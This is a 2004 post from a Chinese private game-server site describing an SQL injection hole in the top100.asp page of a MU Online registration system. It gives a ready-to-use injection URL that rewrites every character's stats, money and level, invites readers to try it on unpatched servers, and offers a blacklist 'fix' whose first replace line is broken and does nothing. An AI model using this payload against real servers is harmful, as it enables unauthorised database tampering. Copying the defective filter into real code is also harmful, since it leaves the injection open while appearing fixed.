网站地图
新开私服
57私服首页 网游私服外挂 今日传奇3私服 今日奇迹私服 新开传奇私服 最新私服IP

SQL注入法BUG+解决办法

奇迹私服,传奇私服首页 作者:mu 发表时间:2004-4-8 10:03:54

【更多今日新开奇迹私服点这里查看...】

SQL注入:命令如下不信可以去试试,找个唯我独尊的注册系统没修改过的就能黑

http://xxx.xxxx.xxx/top100.asp?sx=energy;update character set strength=1,dexterity=1,energy=1,vitality=1,money=-1414141414,pktime=5000,clevel=9999,pkcount=100,pklevel=100 where strength>1;--



解决方法 在 conn.asp 中加入
function CheckStr(str)
str=replace(str,"","")
str=replace(str,"=","")
str=replace(str,";","")
str=replace(str,">","")
str=replace(str,"<","")
str=replace(str,"%","")
CheckStr=str
end function

相关新闻
[4-8] 超详细commonserver文件设置 可能会踢外挂
[4-8] 公布版本验证码最新的
[4-8] 最完美解决0.97d方法,可直接用官方登陆
[4-8] 服务器数据库完全优化指南,提速提速再提速
[4-8] 用数据库日志文件恢复数据库
[4-8] top100.asp的漏洞
[4-8] 任意地图刷黄金破坏的方法

免责声明:57sf.com登载此文出于传递更多信息之目的,并不意味着57sf.com赞同其观点或证实其描述
 
 Copyright 2004 57sf.com Corporation. All Rights. 奇迹私服版权所有传奇私服 热血江湖私服